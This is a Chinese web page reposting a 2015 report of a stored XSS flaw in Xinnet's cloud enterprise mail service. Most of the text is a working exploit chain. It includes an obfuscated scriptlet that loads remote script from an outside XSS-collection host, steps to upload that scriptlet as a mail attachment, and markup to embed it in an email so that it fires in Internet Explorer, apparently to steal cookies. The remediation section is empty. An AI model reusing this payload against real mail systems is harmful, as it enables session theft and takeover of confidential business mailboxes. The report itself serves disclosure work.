鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

新网云邮又一个存储型XSS(利用技巧)

来源:互联网 作者:佚名 时间:2015-10-19 08:38
云邮是新网互联自主研发的第二代企业邮箱系统;在兼具第一代企业邮箱以域名邮箱为核心特征及系列功能的同时,融入了统一通信概念和技术,集成邮件、短信、传真、语音、视频、即时通信等多种通信方式,支持PC、手机等多种终端设备的使用,使得企业邮箱服务进入
云邮是新网互联自主研发的第二代企业邮箱系统;在兼具第一代企业邮箱以“域名邮箱”为核心特征及系列功能的同时,融入了统一通信概念和技术,集成邮件、短信、传真、语音、视频、即时通信等多种通信方式,支持PC、手机等多种终端设备的使用,使得企业邮箱服务进入一个新的时代。
企业邮箱啊 该有多少机密文件 
和这个一样:http://www.2cto.com/Article/201305/213207.html
代码:
 
 
<x style="behavior:url(test.sct)"></x>
 
test.sct代码:
 
 
<SCRIPTLET>
<IMPLEMENTS Type="Behavior"></IMPLEMENTS>
<SCRIPT Language="javascript">
alert(1);
(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(
104,116,116,112,58,47,47,120,115,115,46,116,119,47,49,48,53,50);document.body.appendChild(window.s)})();
</SCRIPT>
</SCRIPTLET>



 
上传一个附件test.sct;地址是:
http://mail.***.cn/webmail/cgijson/mailattach.php?file_name=test.sct&file_size=136&content_type=application%2Foctet-stream&attinfo=4-1693-1874-base64&mid=1367929065.56558.mx21.dns.com.cn%2CS%3D1925%40new&fid=new
 
发邮件插入代码:
 
 
<x style="behavior:url(http://mail.***.cn/webmail/cgijson/mailattach.php?file_name=test.sct&file_size=136&content_type=application%2Foctet-stream&attinfo=4-1693-1874-base64&mid=1367929065.56558.mx21.dns.com.cn%2CS%3D1925%40new&fid=new)"></x>
 
IE浏览器打开邮件就触发了:
 
 
Cookie:
 
 
修复方案:

:) 

 
网友评论
<